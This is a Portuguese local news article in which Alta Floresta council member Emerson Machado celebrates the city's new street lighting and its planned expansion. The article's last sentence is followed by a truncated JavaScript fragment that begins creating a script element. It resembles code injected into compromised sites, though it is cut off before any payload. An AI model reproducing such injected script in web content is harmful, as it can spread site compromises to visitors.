Capa / Cidades / Na volta do recesso Emerson comemora sucesso da nova iluminação da cidade

Na volta do recesso Emerson comemora sucesso da nova iluminação da cidade

Emerson MachadoDa Redação

O assunto “iluminação pública” voltou a ser debatido, desta vez na abertura das sessões legislativas de 2015, que aconteceu ontem no plenário de deliberações da Câmara Municipal. O vereador Emerson Machado (PMDB) afirmou que vinha trabalhando há mais de um ano para que a prefeitura mudasse o cenário de Alta Floresta com a implantação das novas luminárias.
Para Emerson Machado, a cidade ganhou em aspecto de beleza, de segurança e principalmente em economia, já que as lâmpadas que foram trocadas são mais econômicas e houve também a troca das chamadas “pétalas” dos superpostes, que dão suporte às novas lâmpadas. “Isso foi colocado há 25 anos e já vinha até causando algum tipo de risco, de cair em cima de carros, ou tinha muita infiltração e queimava muitas lâmpadas, então o projeto é muito maior que isso”, afirmou Machado.
Segundo Emerson Machado, o benefício não ficará apenas na região central, o bairro Cidade Alta também terá troca das lâmpadas, assim como o Jardim das Oliveiras que deverá ter seu principal acesso e as ruas do bairro, iluminadas, garantindo desta forma melhor segurança. “Já vamos começar a trabalhar em cima de levar esta troca de lâmpadas para a avenida do aeroporto, que é onde o pessoal faz caminhadas, é muito importante a segurança”, profetizou Machado.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top